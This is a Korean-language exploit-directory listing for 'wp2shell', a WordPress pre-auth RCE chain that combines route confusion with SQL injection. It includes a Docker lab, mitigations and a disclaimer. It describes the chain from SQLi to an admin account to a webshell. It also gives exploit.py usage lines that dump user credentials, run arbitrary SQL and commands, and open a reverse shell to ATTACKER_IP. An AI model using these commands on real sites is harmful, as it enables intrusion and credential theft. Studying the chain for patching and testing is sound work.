Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-63030-CVE-2026-60137 — 사전 인증 RCE 익스플로잇 for WordPress (CVE-2026-63030 + CVE-2026-60137) — 라우트 혼동과 SQL 인젝션을 연쇄적으로 이용해 완전한 셸 접근 권한을 획득합니다. 안전한 테스트를 위한 Docker 랩 포함. | Kitploit
도구/GitHubGitHub/giangdurian/cve-2026-63030-cve-2026-60137
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & EducationLabs & Practice
GitHubgiangdurian/cve-2026-63030-cve-2026-60137

CVE-2026-63030-CVE-2026-60137

사전 인증 RCE 익스플로잇 for WordPress (CVE-2026-63030 + CVE-2026-60137) — 라우트 혼동과 SQL 인젝션을 연쇄적으로 이용해 완전한 셸 접근 권한을 획득합니다. 안전한 테스트를 위한 Docker 랩 포함.

저장소 보기
21개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-63030 & CVE-2026-60137 — wp2shell

WordPress Core Pre-Auth RCE — Route Confusion + SQL Injection 연쇄를 통한 Remote Code Execution

CVECVE-2026-63030 + CVE-2026-60137
별칭wp2shell
취약점 유형REST API Route Confusion → SQL Injection → RCE
심각도치명적 — CVSS 10.0
영향 버전WordPress 6.9.0–6.9.4, 7.0.0–7.0.1
수정 버전WordPress 6.8.6, 6.9.5, 7.0.2
인증 필요없음 (Pre-Auth)

개요

wp2shell은 WordPress Core의 2가지 취약점을 결합한 공격 체인의 이름입니다:

  • CVE-2026-63030 — Route Confusion: 배치 엔드포인트(/wp-json/batch/v1)에서 sub-request의 경로가 잘못되었을 때 $matches[] 배열과 $validation[] 배열 간의 인덱스가 어긋나, 다음 sub-request가 잘못된 handler에서 실행되어 REST API 스키마 검증을 우회합니다.
  • CVE-2026-60137 — SQL Injection: WP_Query::get_posts()가 author__not_in 매개변수를 배열 대신 문자열로 받을 때 이를 정제(sanitize)하지 않아 → raw SQL injection이 발생합니다.

두 버그가 결합되어 완전한 Pre-Auth RCE 체인을 형성합니다 — 자격 증명 없이 HTTP 요청만으로 서버에서 셸을 획득할 수 있습니다.

공격 체인

root@kitploit:~
Route Confusion (bypass REST validation)
    → SQL Injection (đọc DB: users, secret keys)
        → oEmbed cache poisoning (read-only SQLi → write primitive)
            → customize_changeset (tạo admin mới)
                → Plugin upload (webshell)
                    → Remote Code Execution

전체 기술 분석은 **REPORT.md**에서 확인하세요.


실습 환경 구성

Lab은 Docker Compose를 사용하며 3개의 컨테이너로 구성됩니다:

컨테이너이미지포트
WordPress (취약 버전)wordpress:6.9.48080
MySQLmysql:8.0내부
phpMyAdminphpmyadmin:latest8081

요구 사항

  • Docker + Docker Compose
  • Python 3.8+ (stdlib만 사용, 추가 패키지 불필요)
  • Bash (setup.sh 실행용)

시작

root@kitploit:~
cd wp2shell-lab
bash setup.sh

스크립트는 자동으로 다음 작업을 수행합니다:

  1. 이미지를 Pull하고 컨테이너를 시작합니다
  2. WordPress 6.9.4를 설치합니다
  3. 샘플 데이터(게시글, 사용자)를 시드합니다
  4. MySQL general log와 WP_DEBUG를 활성화합니다

완료되면 "WP2Shell Lab — READY!" 가 로그인 정보와 함께 표시됩니다.

정리

root@kitploit:~
cd wp2shell-lab
docker compose down -v

익스플로잇 사용법

root@kitploit:~
# Kiểm tra vulnerability
python3 exploit.py check http://TARGET:8080

# Kiểm tra + xác nhận SQLi
python3 exploit.py check --confirm-sqli http://TARGET:8080

# Đọc user credentials từ database
python3 exploit.py read --preset users http://TARGET:8080

# Chạy câu SQL tùy ý
python3 exploit.py read --query "SELECT @@version" http://TARGET:8080

# Full RCE — chạy command
python3 exploit.py shell --cmd "id" http://TARGET:8080

# Reverse shell
python3 exploit.py shell --reverse ATTACKER_IP:PORT http://TARGET:8080

PoC 스크립트는 Icex0/wp2shell-poc을 참고하여 처음부터 다시 작성되었습니다. Python 3 stdlib만 사용하며 추가 종속성 설치가 필요 없습니다.


익스플로잇 조건

조건요구 사항
WordPress 버전6.9.0–6.9.4 또는 7.0.0–7.0.1
REST API batch endpoint접근 가능 (기본 활성화)
인증불필요
네트워크공격자가 WordPress에 도달 가능

완화 방안

  1. WordPress 업그레이드 — >= 6.9.5 또는 >= 7.0.2로 업그레이드 (유일한 근본적 해결 방법).
  2. 배치 엔드포인트 일시 비활성화 — functions.php에 add_filter('rest_batch_disabled', '__return_true');를 추가합니다.
  3. WAF 규칙 — SQL 키워드를 포함하는 /wp-json/batch/v1 요청을 차단합니다.

Disclaimer

이 저장소는 통제된 랩 환경에서 연구, 학습 및 CTF 목적으로 제작되었습니다. 실제 시스템을 공격하는 데 사용하지 마십시오. 허가되지 않은 모든 익스플로잇 행위는 법 위반입니다.


참고 자료

  • Icex0/wp2shell-poc — 참조한 원본 PoC
  • WordPress 6.9.4 — class-wp-rest-server.php
  • WordPress 6.9.4 — class-wp-query.php
  • Patch diff 6.9.4 -> 6.9.5
도구 다운로드